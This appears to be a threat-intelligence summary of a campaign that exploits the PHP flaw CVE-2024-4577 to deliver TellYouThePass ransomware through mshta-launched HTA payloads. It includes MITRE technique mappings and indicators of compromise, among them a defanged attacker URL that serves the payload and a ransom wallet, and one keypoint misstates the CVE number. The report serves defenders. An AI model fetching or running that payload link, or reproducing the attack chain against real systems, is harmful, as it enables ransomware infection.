Imperva Threat Research reports attacker activity weaponizing CVE-2024-4577 to distribute the TellYouThePass ransomware, showing a living-off-the-land style using mshta.exe to fetch remote payloads. The campaign involves WebShell uploads, VBScript in HTA, in-memory PE loading, C2 communications, and file encryption across targeted systems. #TellYouThePass #CVE-2024-4577 #Mshta #HTA #VBScript #WebShell #C2
Keypoints
- Imperva Threat Research tracked attacker activity exploiting CVE-2024-4577 to deliver TellYouThePass ransomware.
- TellYouThePass ransomware has been active since 2019, targeting Windows and Linux and previously using CVEs such as CVE-2021-44228 and CVE-2023-46604.
- Attack vectors include WebShell upload attempts and campaigns to place ransomware on target systems.
- Attackers used the CVE-2024-3577 exploit to run arbitrary PHP code and leverage mshta.exe to execute a remote HTML application payload.
- Initial infection uses an HTA file (dd3.hta) containing malicious VBScript that decodes and loads a PE into memory; a .NET variant was observed.
- Following infection, the malware performs C2 beaconing over HTTP, enumerates directories, kills processes, encrypts files, and writes a READ_ME10.html in the web root with tell‑you‑the‑pass details.
- Community discussions emerged quickly, with recommendations to patch vulnerabilities, deploy a Web Application Firewall, and use antivirus as defenses.
MITRE Techniques
- [T1218.005] Mshta – The attackers use the mshta.exe binary to execute a remote HTML application payload hosted on an attacker-controlled web server, enabling execution of the payload via an authenticated binary. “using the ‘system’ function to run an HTML application file hosted on an attacker-controlled web server via the mshta.exe binary.”
- [T1059.005] VBScript – The initial infection uses an HTA file that contains malicious VBScript. “The initial infection is performed with the use of an HTA file (dd3.hta), which contains a malicious VBScript.”
- [T1505.003] Web Shell – WebShell upload attempts are part of the attack vector to maintain access or persist in targets. “…including WebShell upload attempts…”
- [T1071.001] Web Protocols – The malware communicates with a C2 server over HTTP for infection notification. “the sample sends an HTTP request to the command-and-control (C2) server containing details about the infected machine as a notification of infection.”
- [T1083] File and Directory Discovery – The binary enumerates directories as part of preparation for encryption. “The binary then enumerates directories…”
- [T1562.001] Impair Defenses – The malware kills processes to hinder defenses during execution. “kills processes…”
- [T1486] Data Encrypted for Impact – The ransomware encrypts files within enumerated directories. “encrypts files within each enumerated directory that has a defined file extension.”
Indicators of Compromise
- [URL] – HTA delivery link used in infection chain – hxxp:/88.218.76[.]13/dd3.hta
- [IP] – Command-and-control / C2 server – 88.218.76[.]13
- [Hash] – HTA sample hashes – 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3, 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
- [Hash] – Extracted .NET binary hash – 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53
- [Bitcoin Wallet] – Ransom payment address used by the campaign – bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l